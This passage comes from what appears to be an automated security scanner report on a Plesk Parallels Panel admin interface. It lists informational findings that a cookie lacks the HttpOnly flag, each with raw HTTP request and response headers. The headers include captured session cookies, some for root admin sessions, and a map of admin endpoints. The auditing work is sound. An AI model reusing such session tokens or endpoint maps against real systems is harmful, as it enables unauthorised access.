Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:49 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=resellers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:49 GMT
Server: sw-cp-server
Content-Length: 14689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:42:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:42:20 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=resellers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:42:21 GMT
Server: sw-cp-server
Content-Length: 14643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=credentials-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:17:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:17:12 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=personal-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:17:12 GMT
Server: sw-cp-server
Content-Length: 28204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 15:27:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server
Content-Length: 9049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/3/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/3/?context=reseller-tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:15:44 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:15:44 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:15:44 GMT
Server: sw-cp-server
Content-Length: 9058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/settings?context=settings HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:27 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=settings; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:28 GMT
Server: sw-cp-server
Content-Length: 13093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/tools?context=tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:34 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=tools; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:35 GMT
Server: sw-cp-server
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list?context=subscriptions HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:09 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:09 GMT
Server: sw-cp-server
Content-Length: 19549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server
Content-Length: 19812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/reset-search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server
Content-Length: 19812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /left.php3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /left.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:34:33 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
